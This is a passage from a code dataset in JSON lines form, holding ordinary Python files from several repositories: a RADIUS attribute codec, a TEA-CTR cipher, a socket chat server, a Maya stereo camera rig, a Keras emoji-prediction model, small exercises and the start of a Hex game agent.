addr))).split(\":\", 2)\n return str(IPNetwork(\"%s/%s\" % (prefix, int(length, 16))))\n\n\ndef DecodeIPv6Address(addr):\n addr = addr + b'\\x00' * (16-len(addr))\n prefix = ':'.join(map('{0:x}'.format, struct.unpack('!'+'H'*8, addr)))\n return str(IPAddress(prefix))\n\n\ndef DecodeAscendBinary(str):\n return str\n\n\ndef DecodeInteger(num, format='!I'):\n return (struct.unpack(format, num))[0]\n\ndef DecodeInteger64(num, format='!Q'):\n return (struct.unpack(format, num))[0]\n\ndef DecodeDate(num):\n return (struct.unpack('!I', num))[0]\n\n\ndef EncodeAttr(datatype, value):\n if datatype == 'string':\n return EncodeString(value)\n elif datatype == 'octets':\n return EncodeOctets(value)\n elif datatype == 'integer':\n return EncodeInteger(value)\n elif datatype == 'ipaddr':\n return EncodeAddress(value)\n elif datatype == 'ipv6prefix':\n return EncodeIPv6Prefix(value)\n elif datatype == 'ipv6addr':\n return EncodeIPv6Address(value)\n elif datatype == 'abinary':\n return EncodeAscendBinary(value)\n elif datatype == 'signed':\n return EncodeInteger(value, '!i')\n elif datatype == 'short':\n return EncodeInteger(value, '!H')\n elif datatype == 'byte':\n return EncodeInteger(value, '!B')\n elif datatype == 'date':\n return EncodeDate(value)\n elif datatype == 'integer64':\n return EncodeInteger64(value)\n else:\n raise ValueError('Unknown attribute type %s' % datatype)\n\n\ndef DecodeAttr(datatype, value):\n if datatype == 'string':\n return DecodeString(value)\n elif datatype == 'octets':\n return DecodeOctets(value)\n elif datatype == 'integer':\n return DecodeInteger(value)\n elif datatype == 'ipaddr':\n return DecodeAddress(value)\n elif datatype == 'ipv6prefix':\n return DecodeIPv6Prefix(value)\n elif datatype == 'ipv6addr':\n return DecodeIPv6Address(value)\n elif datatype == 'abinary':\n return DecodeAscendBinary(value)\n elif datatype == 'signed':\n return DecodeInteger(value, '!i')\n elif datatype == 'short':\n return DecodeInteger(value, '!H')\n elif datatype == 'byte':\n return DecodeInteger(value, '!B')\n elif datatype == 'date':\n return DecodeDate(value)\n elif datatype == 'integer64':\n return DecodeInteger64(value)\n else:\n raise ValueError('Unknown attribute type %s' % datatype)\n","repo_name":"zeroleo12345/radius_server_python","sub_path":"src/pyrad/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":7061,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"48"} +{"seq_id":"33376708784","text":"# point实体物件的设计: 平面座标上的点\nclass point:\n #定义初始化函式 __init__(), 和固定参数self\n def __init__(self,x,y):\n self.x=x\n self.y=y\n #此实体物件包含 X , Y 两个实体属性\n #定义此类别是为了产生实体物件\n\n#建立第一个实体物件\np = point(3,4) # point()产生点的实体物件放入变数 p\nprint(p.x,p.y) #实体物件.属性名称\n\n#建立第二个实体物件\np2=point(5,6) #5对应到x , 6对应到y\nprint(p2.x,p2.y) #p2.x对应到上方self.x=x的x","repo_name":"alankowabunga/Python","sub_path":"peng_basics/17.3instance.py","file_name":"17.3instance.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71773105105","text":"def reduce(function,iterable):\n\n if len(iterable) == 0:\n return None\n result=iterable[0]\n for x in iterable[1:]:\n result = function(result,x)\n return result\n\nprint(reduce(lambda x,y: x+y, [1,2,3,4]))","repo_name":"Kacyk27/Kacyk27-103-exercises-Advanced-Python-Programming","sub_path":"Exercise063.py","file_name":"Exercise063.py","file_ext":"py","file_size_in_byte":225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"44224459206","text":"# ********************************************* #\n# Tiny Encryption Algorithm CTR Implementation #\n# Ian Bolin & Trevor Loula #\n# CS-3350 Foundations of Computer Security #\n# ********************************************* #\n\nimport sys\nimport tea_algorithm\n\nclass TEA_CTR(tea_algorithm.TEA):\n #bytestrings must be padded to a length of x*8 bytes (64 bits) to align with block length.\n #this is to allow for different padding schemes\n\n #input: bytestring, int[4], int[2]\n @staticmethod\n def encrypt(plaintext, key, iv):\n key = [int.from_bytes(key[0], \"big\"), int.from_bytes(key[1], \"big\"), int.from_bytes(key[2], \"big\"), int.from_bytes(key[3], \"big\")]\n iv = [int.from_bytes(iv[0], \"big\"), int.from_bytes(iv[1], \"big\")]\n if len(plaintext) % 8 != 0:\n print(\"Bad plaintext length\")\n return b\"\"\n ciphertext = b\"\"\n for i in range(0, len(plaintext), 8):\n temp = [int.from_bytes(plaintext[i:i+4], \"big\"), int.from_bytes(plaintext[i+4:i+8], \"big\")]\n (Left, Right) = tea_algorithm.TEA.encrypt(iv, key)\n ciphertext += (Left ^ temp[0]).to_bytes(4, \"big\")\n ciphertext += (Right ^ temp[1]).to_bytes(4, \"big\")\n if (iv[1] == 0xffffffff):\n iv[1] = 0x0\n if (iv[0] == 0xffffffff):\n iv[0] = 0x0\n else:\n iv[0] += 1\n else:\n iv[1] += 1\n return ciphertext\n\n #input: bytestring, int[4], int[2]\n @staticmethod\n def decrypt(ciphertext, key, iv):\n key = [int.from_bytes(key[0], \"big\"), int.from_bytes(key[1], \"big\"), int.from_bytes(key[2], \"big\"), int.from_bytes(key[3], \"big\")]\n iv = [int.from_bytes(iv[0], \"big\"), int.from_bytes(iv[1], \"big\")]\n if len(ciphertext) % 8 != 0:\n print(\"Bad ciphertext length\")\n return b\"\"\n plaintext = b\"\"\n for i in range(0, len(ciphertext), 8):\n temp = [int.from_bytes(ciphertext[i:i+4], \"big\"), int.from_bytes(ciphertext[i+4:i+8], \"big\")]\n (Ltemp, Rtemp) = tea_algorithm.TEA.encrypt(iv, key)\n plaintext += (Ltemp ^ temp[0]).to_bytes(4, \"big\")\n plaintext += (Rtemp ^ temp[1]).to_bytes(4, \"big\")\n if (iv[1] == 0xffffffff):\n iv[1] = 0x0\n if (iv[0] == 0xffffffff):\n iv[0] = 0x0\n else:\n iv[0] += 1\n else:\n iv[1] += 1\n return plaintext","repo_name":"tloula/tea-implementation","sub_path":"tea_ctr.py","file_name":"tea_ctr.py","file_ext":"py","file_size_in_byte":2540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31807206694","text":"from threading import Thread\nfrom socket import AF_INET, socket, SOCK_STREAM\n\n\nclients = {}\naddresses = {}\naux_clients = {}\n\nHOST = 'localhost'\nPORT = 33000\nBUFSIZ = 1024\nADDR = (HOST, PORT)\n\nSERVER = socket(AF_INET, SOCK_STREAM)\nSERVER.bind(ADDR)\n\ncontinue_listening = True\n\n\ndef accept_incoming_connections():\n \"\"\"Funcion para manejar la conexion de nuevos clientes\"\"\"\n while True:\n client, client_address = SERVER.accept()\n print(\"%s:%s Se ha conectado.\" % client_address)\n addresses[client] = client_address\n Thread(target=handle_client, args=(client,)).start()\n\n\ndef handle_client(client):\n \"\"\"Funcion para manejar a los clientes\"\"\"\n\n name = client.recv(BUFSIZ).decode(\"utf8\")\n clients[client] = name\n # No repetir nombres de clientes\n aux_clients[name] = client\n print(name)\n msg = \"serverupdt|%s Se ha unido!\" % name\n msg_user_list = str(list(clients.values()))\n msg = msg+\" listado de usuarios: \"+msg_user_list\n broadcast(bytes(msg, \"utf8\"))\n global continue_listening\n while continue_listening:\n msg = client.recv(BUFSIZ)\n print(msg)\n decoded_msg = msg.decode(\"utf-8\").split('|')\n print(decoded_msg)\n if decoded_msg[0] == \"file\":\n print(\"file\")\n continue_listening = False\n broadcast(bytes(decoded_msg[1]+\"|\"+name+\"|\"\n + \"File Sent: \"+decoded_msg[2], \"utf-8\"))\n send_file_to_client(client, decoded_msg[1], decoded_msg[2])\n elif decoded_msg[0] != \"{quit}\":\n if decoded_msg[0] == \"broadcast\":\n broadcast(msg)\n else:\n send_message_to_clients(msg)\n else:\n client.close()\n del clients[client]\n del aux_clients[name]\n msg = \"serverupdt|%s Se ha ido, ista de clientes.\" % name\n msg_user_list = str(list(clients.values()))\n msg = msg+\" listado de usuarios: \"+msg_user_list\n broadcast(bytes(msg, \"utf8\"))\n break\n\n\ndef send_message_to_clients(message):\n message = message.decode(\"utf8\").split(\"|\")\n userlist = message[:-2]\n print(userlist)\n for client in userlist:\n if client in aux_clients:\n client_to = aux_clients[client]\n msg = client+\"|\" + message[-2]+\"|\"+message[-1]\n print(msg)\n client_to.send(bytes(msg, \"utf-8\"))\n\n\ndef send_file_to_client(current, _client, file_name_format):\n file_name_format = file_name_format.split('.')\n f_format = file_name_format.pop()\n f_name = ' '.join(file_name_format)\n filename_l = 'temp.'+f_format\n current.settimeout(1)\n with open(filename_l, 'wb') as f:\n print('file opened')\n while True:\n print('receiving data...')\n try:\n data = current.recv(BUFSIZ)\n print('data=%s' % data)\n f.write(data)\n except OSError:\n print('done...')\n break\n\n # TODO send waring for file return\n\n print(\"forwarding to client\")\n client_to = aux_clients[_client]\n client_to.send(bytes(\"file|\"+f_name+\".\"+f_format, \"utf-8\"))\n\n f = open(filename_l, 'rb')\n chunk = f.read(BUFSIZ)\n while (chunk):\n client_to.send(chunk)\n print('Sent ', repr(chunk))\n chunk = f.read(BUFSIZ)\n f.close()\n client_to.send(bytes(\"stop\", \"utf-8\"))\n print('Done sending')\n current.settimeout(None)\n global continue_listening\n continue_listening = True\n\n\ndef broadcast(msg, prefix=\"\"): # prefix para identificacion de nombre\n \"\"\"Envia un mensaje hacia todos los clientes\"\"\"\n\n for sock in clients:\n sock.send(bytes(prefix, \"utf8\")+msg)\n\n\nif __name__ == \"__main__\":\n SERVER.listen(5)\n print(\"Waiting for connection...\")\n ACCEPT_THREAD = Thread(target=accept_incoming_connections)\n ACCEPT_THREAD.start()\n ACCEPT_THREAD.join()\n SERVER.close()\n","repo_name":"Wason1797/Chat-Sockets-Py","sub_path":"Server.py","file_name":"Server.py","file_ext":"py","file_size_in_byte":3947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31828640766","text":"'''\nbuild a simple off-axis stereo camera rig, based on vray env\nfor Maya 2016\n'''\n\nimport maya.cmds as cmds\nimport maya.mel as mel\nimport maya.app.stereo.stereoCameraRig\n\n# load vray and make it as currentRenderer\nif not cmds.pluginInfo('vrayformaya', q= 1, loaded= 1):\n cmds.loadPlugin('vrayformaya')\ncmds.setAttr('defaultRenderGlobals.currentRenderer', 'vray', type= 'string')\n\ntargetCamera = ''\ntargetZeroPn = ''\nautoParent = 0\n\nif len(cmds.ls(sl= 1, hd= 2)) >= 1:\n\ttargetCamera = cmds.ls(sl= 1, hd= 2)[0]\n\ttry:\n\t\ttargetZeroPn = cmds.ls(sl= 1, hd= 2)[1]\n\texcept:\n\t\tpass\n\tautoParent = 1\nelse:\n\tpass\n\n# build vray stereo camera rig and do some basic stereo setup\nmyStereoCamRig = maya.app.stereo.stereoCameraRig.createStereoCameraRig(rigName= 'StereoCamera')\nmyStereoCamCenterShape = cmds.listRelatives(myStereoCamRig[0], s= 1, f= 1)[0]\ncmds.setAttr(myStereoCamCenterShape + '.stereo', 2)\nmel.eval('vray addAttributesFromGroup \"' + myStereoCamCenterShape + '\" vray_cameraStereoscopic 1')\ncmds.setAttr(myStereoCamCenterShape + '.vrayCameraStereoscopicOn', 1)\ncmds.setAttr(myStereoCamCenterShape + '.vrayCameraStereoscopicAdjustResolution', 1)\n\n\n# make locators and group\nmyZeroPoint_invert = cmds.group(em= 1)\nmyZeroPoint_offset = cmds.group(em= 1)\nmyZeroPoint_loc = cmds.spaceLocator()[0]\nmyZeroPoint_handle = cmds.spaceLocator()[0]\n\n\n# assembling rigs\ncmds.parent(myZeroPoint_invert, myStereoCamRig[0])\ncmds.parent(myZeroPoint_loc, myZeroPoint_invert)\ncmds.parent(myZeroPoint_handle, myZeroPoint_offset)\ncmds.pointConstraint(myZeroPoint_handle, myZeroPoint_loc, mo= 0)\ncmds.setAttr(myZeroPoint_invert + '.ry', 180)\ncmds.setAttr(myZeroPoint_loc + '.v', 0)\ncmds.connectAttr(myZeroPoint_loc + '.tz', myStereoCamCenterShape + '.zeroParallax')\n\n# connect some useful attrs\ncmds.addAttr(myZeroPoint_handle, ln= 'zeroParallaxPlane', at= 'bool', k= 1)\ncmds.connectAttr(myZeroPoint_handle + '.zeroParallaxPlane', myStereoCamCenterShape + '.zpp')\n\ncmds.addAttr(myZeroPoint_handle, ln= 'FocalLength', at= 'float', min= 2.5, k= 1)\ncmds.connectAttr(myZeroPoint_handle + '.FocalLength', myStereoCamCenterShape + '.focalLength')\n\ncmds.addAttr(myZeroPoint_handle, ln= 'InteraxialSeparation', at= 'float', min= 0, k= 1)\ncmds.connectAttr(myZeroPoint_handle + '.InteraxialSeparation', myStereoCamCenterShape + '.interaxialSeparation')\n\ncmds.addAttr(myZeroPoint_handle, ln= 'CameraLocScale', at= 'float', min= 0.001, k= 1)\ncmds.connectAttr(myZeroPoint_handle + '.CameraLocScale', myStereoCamCenterShape + '.lls')\ncmds.connectAttr(myZeroPoint_handle + '.CameraLocScale', cmds.listRelatives(myStereoCamRig[1], s= 1, f= 1)[0] + '.lls')\ncmds.connectAttr(myZeroPoint_handle + '.CameraLocScale', cmds.listRelatives(myStereoCamRig[2], s= 1, f= 1)[0] + '.lls')\n\n\n# setup default\ncmds.setAttr(myZeroPoint_handle + '.zeroParallaxPlane', 1)\ncmds.setAttr(myZeroPoint_handle + '.FocalLength', 16)\ncmds.setAttr(myZeroPoint_handle + '.InteraxialSeparation', 6.35)\ncmds.setAttr(myZeroPoint_handle + '.CameraLocScale', 1)\ncmds.setAttr(myZeroPoint_handle + '.tz', -10)\ncmds.select(myZeroPoint_handle, r= 1)\n\n\n# hide or lock unused attr\ndef attrLocknHide(atName, at):\n\tcmds.setAttr(atName + '.' + at + 'x', k= 0)\n\tcmds.setAttr(atName + '.' + at + 'y', k= 0)\n\tcmds.setAttr(atName + '.' + at + 'z', k= 0)\n\tcmds.setAttr(atName + '.' + at, l= 1)\n\nattrLocknHide(myZeroPoint_handle, 'r')\nattrLocknHide(myStereoCamRig[0], 's')\nattrLocknHide(myZeroPoint_loc, 't')\nattrLocknHide(myZeroPoint_loc, 'r')\nattrLocknHide(myZeroPoint_loc, 's')\nattrLocknHide(myZeroPoint_invert, 't')\nattrLocknHide(myZeroPoint_invert, 'r')\nattrLocknHide(myZeroPoint_invert, 's')\n\n\nif autoParent:\n\tfail = []\n\ttry:\n\t\tcmds.parentConstraint(targetCamera, myStereoCamRig[0], mo= 0)\n\texcept:\n\t\tfail.append('Camera -> ' + targetCamera)\n\ttry:\n\t\tcmds.parentConstraint(targetZeroPn, myZeroPoint_offset, mo= 0)\n\texcept:\n\t\tfail.append('ZeroPoint -> ' + targetZeroPn)\n\tif fail:\n\t\tcmds.warning('Fail to auto parent: ' + str(fail))\n\n\n# rename rigs\ncmds.rename(myZeroPoint_invert,'zeroPoint_invert')\ncmds.rename(myZeroPoint_loc,'zeroPoint_loc')\ncmds.rename(myZeroPoint_offset,'zeroPoint_offset')\ncmds.rename(myZeroPoint_handle,'zeroPoint_handle')","repo_name":"davidlatwe/MS_Research","sub_path":"_research/stereoRig.py","file_name":"stereoRig.py","file_ext":"py","file_size_in_byte":4163,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"19615884597","text":"def divide(nodes_dict, l_index, r_index):\r\n if ((r_index - l_index) == 1):\r\n # add_prefix(nodes_dict,l_index,l_index+1,'1')\r\n return\r\n elif (r_index <= l_index):\r\n return\r\n spl_index = l_index + (r_index - l_index) / 2\r\n # print \"split index = %d\" % spl_index\r\n l_sum = sum([x._freak for x in nodes_dict[l_index: spl_index]])\r\n r_sum = sum([x._freak for x in nodes_dict[spl_index:r_index]])\r\n while True:\r\n delta = l_sum - r_sum\r\n # print \"delta = %d\" % delta\r\n if (delta < 0):\r\n l_sum = l_sum + nodes_dict[spl_index]._freak\r\n r_sum = r_sum - nodes_dict[spl_index]._freak\r\n spl_index_temp = spl_index + 1\r\n elif (delta > 0):\r\n spl_index_temp = spl_index - 1\r\n l_sum = l_sum - nodes_dict[spl_index_temp]._freak\r\n r_sum = r_sum + nodes_dict[spl_index_temp]._freak\r\n if (abs(delta) > abs(l_sum - r_sum)):\r\n spl_index = spl_index_temp\r\n else:\r\n add_state(nodes_dict, l_index, spl_index, '1')\r\n # print \"left: %s\" % nodes_dict[l_index: spl_index]\r\n divide(nodes_dict, l_index, spl_index)\r\n add_state(nodes_dict, spl_index, r_index, '0')\r\n # print \"right: %s\" % nodes_dict[spl_index:r_index]\r\n divide(nodes_dict, spl_index, r_index)\r\n return\r\n\r\n# return {\"left\":[x for x in srt_dict[l_index:spl_index]],\"right\":[x for x in srt_dict[spl_index:r_index]]}\r\n\r\ndef add_state(nodes_dict, start, end, bin_state):\r\n for index in range(start, end):\r\n temp = nodes_dict[index]\r\n temp.addCode(bin_state)\r\n\r\n\r\ndef sort(dict):\r\n return sorted(list(dict.items()), key=lambda item: item[1], reverse=True)\r\n\r\n\r\nclass Node:\r\n _code = \"\"\r\n _signal = 0\r\n _freak = 0\r\n\r\n def __init__(self, item):\r\n self._signal = item[0]\r\n self._freak = item[1]\r\n\r\n def __repr__(self):\r\n return \"Node(%d)-%s\" % (self._signal, self._code)\r\n\r\n def addCode(self, bin_state):\r\n self._code = self._code + bin_state\r\n\r\n\r\ndef get_encoded_dict(dict):\r\n srt_dict = sort(dict)\r\n nodes_dict = [Node(x) for x in srt_dict]\r\n divide(nodes_dict, 0, len(nodes_dict))\r\n return {node._signal: node._code for node in nodes_dict}\r\n\r\n\r\ndef encode(signals, map):\r\n dec_code = get_encoded_dict(map)\r\n return (''.join([str(dec_code[x]) for x in signals]) if len(dec_code) > 1 else '1' * len(signals),\r\n dict((v, k) for k, v in dec_code.iteritems()))\r\n\r\n\r\ndef size_list_to_str(temp):\r\n return sum(map(lambda x: len(str(x)), temp)) + len(temp)\r\n\r\n\r\n","repo_name":"ILDAR9/semestr","sub_path":"semestr/encoder.py","file_name":"encoder.py","file_ext":"py","file_size_in_byte":2663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27160430900","text":"import tkinter as tk\nimport tkinter.ttk as ttk\nimport re\n\nclass RegexEntry(ttk.Labelframe):\n \"\"\"Class that holds a entry box for regular expression with flags\"\"\"\n # This is a chopped up copy of regex tester demo on python.org\n def __init__(self,master):\n # Init the parent frame for this call that all widgets will sit in\n ttk.LabelFrame.__init__(self,master,text='Regular Expression')\n self.grid(sticky='nsew',padx=5,pady=5)\n self.grid_columnconfigure(0,weight=1)\n self.grid_rowconfigure(6,weight=1)\n\n self.compiled=None\n self.new_status_display_label()\n self.new_re_entry()\n\n # This adds all the check boxes for re flags\n self.addoptions()\n self.recompile()\n\n def new_status_display_label(self):\n \"\"\" Displays any re compile errors \"\"\"\n self.statusdisplay = ttk.Label(self, text='')\n self.statusdisplay.grid(sticky='nwe',pady=5,padx=5,row=0,column=0,ipadx=5,ipady=5)\n self.bg=self.statusdisplay['background']\n\n def new_re_entry(self):\n \"\"\" Entry the re string \"\"\"\n self.var=tk.StringVar(self)\n # Entry widget to type the re into\n self.entry=ttk.Entry(self,textvariable=self.var)\n self.entry.grid(sticky='nwe',pady=5,padx=5,row=1,column=0)\n # Recomplile the regular expression every time a key is pressed in the entry widget\n self.entry.bind('', self.recompile) \n \n def addoptions(self):\n \"\"\"Adds re Flags under regex entry\"\"\"\n self.frames = []\n self.boxes = []\n self.vars = []\n for index,name in enumerate(('IGNORECASE',\n 'MULTILINE',\n 'DOTALL',\n 'VERBOSE'),start=1):\n if len(self.boxes) % 3 == 0:\n frame = ttk.Frame(self)\n frame.grid(sticky='nw')\n self.frames.append(frame)\n val = getattr(tk.re, name).value\n var = tk.IntVar()\n box = ttk.Checkbutton(frame,\n variable=var, text=name,\n offvalue=0, onvalue=val,\n command=self.recompile)\n\n box.grid(sticky='nw',row=2,column=index)\n self.boxes.append(box)\n self.vars.append(var)\n\n def getflags(self):\n \"\"\"Retreives re flags from checkboxes under regex entry\"\"\"\n flags = 0\n for var in self.vars:\n flags = flags | var.get()\n return flags\n\n def recompile(self, event=None):\n \"\"\"Recompliles the Regular Expression and updates the statusdisplay\"\"\"\n try:\n self.compiled = re.compile(self.entry.get(),\n self.getflags())\n self.statusdisplay.config(text=\"\", background=self.bg)\n except tk.re.error as msg:\n self.compiled = None\n self.statusdisplay.config(\n text=f\"re.error: {str(msg)}\",\n background=\"red\")\n","repo_name":"Razmo99/Tenderizer","sub_path":"Tenderizer/app_tk_widgets/components/regexentry.py","file_name":"regexentry.py","file_ext":"py","file_size_in_byte":2999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3798714330","text":"from selenium import webdriver\nimport os\ndriver = webdriver.Firefox(executable_path=\"./firefoxDriver/geckodriver\")\nfrom selenium.webdriver.common.by import By\ndriver.get(\"https://doko.dwit.edu.np/class/show/1?stream=BSc.CSIT\")\nalllinks = driver.find_elements(By.XPATH,'//html/body/div[2]/section/section/section/div/div/a/p')\nfor link in alllinks:\n print(link.text)\n\nfinalPath = os.path.join(os.getcwd(),\"MyText.txt\")\nprint(finalPath)\n\nfor x in alllinks:\n name = x.text\n filename = x.text + \".txt\"\n d = open(filename,\"w\")\n d.write(\"i am \"+ name )\ndriver.close()\n ","repo_name":"Ashwot-Acharya/Programming-Work","sub_path":"selenuim/test/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72448307985","text":"from __future__ import print_function\nfrom keras.models import Sequential, load_model\nfrom keras.layers import Input, Dense, Activation\nfrom keras.layers import LSTM, GRU, SimpleRNN\nfrom keras.optimizers import RMSprop, Adam\nfrom keras.utils.data_utils import get_file\nfrom keras.layers.normalization import BatchNormalization as BN\nfrom keras.layers.noise import GaussianNoise as GN\nfrom keras.layers.noise import GaussianDropout as GD\nimport numpy as np\nimport random\nimport sys\nimport tensorflow as tf \ntf.logging.set_verbosity(tf.logging.ERROR)\nimport glob\nimport json\nimport pickle\nimport msgpack\nimport msgpack_numpy as mn\nmn.patch()\nimport MeCab\nimport plyvel\nfrom itertools import cycle as Cycle\nimport dill\n\ndef discriminator_model():\n from keras.layers import Input, Dense, Embedding, merge, Convolution2D as Conv2D, MaxPooling2D, Dropout, ZeroPadding2D\n from keras.layers.core import Reshape, Flatten\n from keras.models import Model, load_model\n from keras.layers.merge import add, concatenate\n sequence_length = 30\n embedding_dim = 256 \n vocabulary_size = 10\n num_filters = 512\n filter_sizes = [3,4,5,1,2]\n inputs = Input(shape=(sequence_length,embedding_dim,), dtype='float64')\n #embedding = Embedding(output_dim=embedding_dim, input_dim=vocabulary_size, input_length=sequence_length)(inputs)\n reshape = Reshape((sequence_length,embedding_dim,1))(inputs)\n #Conv2D(512, (3, 256), padding=\"valid\", kernel_initializer=\"normal\", data_format=\"channels_last\", activation=\"relu\")\n\n conv_0 = Conv2D(num_filters, (filter_sizes[0], embedding_dim), kernel_initializer=\"normal\", data_format=\"channels_last\", activation=\"relu\")(reshape)\n conv_1 = Conv2D(num_filters, (filter_sizes[1], embedding_dim), kernel_initializer=\"normal\", data_format=\"channels_last\", activation=\"relu\")(reshape)\n conv_2 = Conv2D(num_filters, (filter_sizes[2], embedding_dim), kernel_initializer=\"normal\", data_format=\"channels_last\", activation=\"relu\")(reshape)\n conv_3 = Conv2D(num_filters, (filter_sizes[3], embedding_dim), kernel_initializer=\"normal\", data_format=\"channels_last\", activation=\"relu\")(reshape)\n conv_4 = Conv2D(num_filters, (filter_sizes[4], embedding_dim), kernel_initializer=\"normal\", data_format=\"channels_last\", activation=\"relu\")(reshape)\n # `MaxPooling2D(pool_size=(28, 1), padding=\"valid\", data_format=\"channels_last\", strides=(1, 1))\n maxpool_0 = MaxPooling2D(pool_size=(sequence_length - filter_sizes[0] + 1, 1), strides=(1,1), padding=\"valid\", data_format=\"channels_last\")(conv_0)\n maxpool_1 = MaxPooling2D(pool_size=(sequence_length - filter_sizes[1] + 1, 1), strides=(1,1), padding=\"valid\", data_format=\"channels_last\")(conv_1)\n maxpool_2 = MaxPooling2D(pool_size=(sequence_length - filter_sizes[2] + 1, 1), strides=(1,1), padding=\"valid\", data_format=\"channels_last\")(conv_2)\n maxpool_3 = MaxPooling2D(pool_size=(sequence_length - filter_sizes[3] + -3, 1), strides=(1,1), padding=\"valid\", data_format=\"channels_last\")(conv_3)\n maxpool_4 = MaxPooling2D(pool_size=(sequence_length - filter_sizes[4] + -2, 1), strides=(1,1),padding=\"valid\", data_format=\"channels_last\")(conv_4)\n\n merged = concatenate([maxpool_0, maxpool_1, maxpool_2, maxpool_3, maxpool_4], axis=1)\n \n output = Dense(units=2048, activation='sigmoid')( \\\n Activation('linear')( \\\n Dropout(0.5)( \\\n Flatten()(merged) ) ) )\n\n model = Model(inputs=inputs, outputs=output)\n adam = Adam()\n model.compile(optimizer=adam, loss='binary_crossentropy', metrics=['accuracy'])\n\n return model\n\ndef main_train():\n print(\"importing data from serialized...\")\n text_vec = pickle.loads(open('./text_vec.pkl', 'rb').read())\n print(\"finished data from serialized...\")\n\n print('Vectorization...')\n X = np.zeros((len(text_vec), 30, 256), dtype=np.float64)\n y = np.zeros((len(text_vec), 2048), dtype=np.float64)\n for i, (text, ans) in enumerate(text_vec):\n if i%10000 == 0:\n print(\"building training vector... iter %d\"%i)\n for t, term in enumerate(text):\n X[i, t, :] = term\n y[i, :] = ans\n model = discriminator_model()\n for iteration in range(1, 101):\n print()\n print('-' * 50)\n print('Iteration', iteration)\n model.fit(X, y, batch_size=128, nb_epoch=1)\n MODEL_NAME = \"./models/snapshot.%09d.model\"%(iteration)\n model.save(MODEL_NAME)\n sys.exit()\n\ndef pred():\n m = MeCab.Tagger('-Owakati')\n emoji_index = pickle.loads(open('./emoji_index.pkl', 'rb').read())\n index_emoji = {index:emoji for emoji, index in emoji_index.items()}\n \n print('now loading term_vec.pkl...')\n term_vec = pickle.loads(open('term_vec.pkl', 'rb').read())\n print('finished loading term_vec.pkl...')\n model_type = sorted(glob.glob('./models/*.model'))[-1]\n print(\"model type is %s\"%model_type)\n model = load_model(model_type)\n print(\"finished model type is %s\"%model_type)\n for line in sys.stdin:\n line = line.strip()\n print(line, end=\" \")\n buff = [\"*\"]*30\n for i,term in enumerate(m.parse(line).strip().split()[:30]):\n buff[i] = term\n X = []\n for term in buff:\n if term_vec.get(term) is not None:\n X.append(term_vec[term])\n else:\n X.append(term_vec[\"*\"])\n results = model.predict(np.array([X]))\n res = {index_emoji[i]:score for i,score in enumerate(results[0].tolist())}\n for emoji, score in sorted(filter(lambda x:x[1]>0.01, res.items()), key=lambda x:x[1]*-1)[:20]:\n print(emoji, \"%d\"%(int(score*100)), end=\" \")\n print()\ndef main():\n if '--train' in sys.argv:\n main_train()\n if '--pred' in sys.argv:\n pred()\nif __name__ == '__main__':\n main()\n","repo_name":"GINK03/emotion2vec","sub_path":"keras-text2vec.py","file_name":"keras-text2vec.py","file_ext":"py","file_size_in_byte":5722,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"11707255012","text":"'''Given an array of integers, where all elements but one occur twice, find the unique element.'''\n#XOR returns the non repeated integer\n\ndef lonelyinteger(a):\n # Write your code here\n res=0\n \n for i in a:\n res ^= i\n return res\n","repo_name":"MERN0/Hackerrank_Sol","sub_path":"Lonely Integer.py","file_name":"Lonely Integer.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24621547033","text":"import hashlib\nimport socket\nfrom random import choice\nfrom time import sleep\n\nimport random\n\nimport os\n\nimport copy\n\nclass NaiveAgent():\n\t\"\"\"This class describes the default Hex agent. It will randomly send a\n\tvalid move at each turn, and it will choose to swap with a 50% chance.\n\t\"\"\"\n\n\tHOST = \"127.0.0.1\"\n\tPORT = 1234\n\n\tdef __init__(self, board_size=11):\n\t\tself.s = socket.socket(\n\t\t\tsocket.AF_INET, socket.SOCK_STREAM\n\t\t)\n\n\t\tself.s.connect((self.HOST, self.PORT))\n\n\t\tself.board_size = board_size\n\t\tself.board = []\n\t\tself.colour = \"\"\n\t\tself.turn_count = 0\n\t\tself.v = {}\n\t\tself.history = []\n\t\tself.LAMBDA = .75\n\t\tself.ALPHA = 0.2\n\n\n\n\tdef run(self):\n\t\t\"\"\"Reads data until it receives an END message or the socket closes.\"\"\"\n\n\t\twhile True:\n\t\t\tdata = self.s.recv(1024)\n\t\t\tif not data:\n\t\t\t\tbreak\n\t\t\t# print(f\"{self.colour} {data.decode('utf-8')}\", end=\"\")\n\t\t\tif (self.interpret_data(data)):\n\t\t\t\tbreak\n\n\t\t# print(f\"Naive agent {self.colour} terminated\")\n\n\tdef interpret_data(self, data):\n\t\t\"\"\"Checks the type of message and responds accordingly. Returns True\n\t\tif the game ended, False otherwise.\n\t\t\"\"\"\n\n\t\tmessages = data.decode(\"utf-8\").strip().split(\"\\n\")\n\t\tmessages = [x.split(\";\") for x in messages]\n\t\t# print(messages)\n\t\tfor s in messages:\n\t\t\tif s[0] == \"START\":\n\t\t\t\tself.board_size = int(s[1])\n\t\t\t\tself.colour = s[2]\n\t\t\t\tself.board = [\n\t\t\t\t\t[0]*self.board_size for i in range(self.board_size)]\n\n\t\t\t\tif self.colour == \"R\":\n\t\t\t\t\tself.make_move()\n\n\t\t\telif s[0] == \"END\":\n\t\t\t\tif(s[1] == 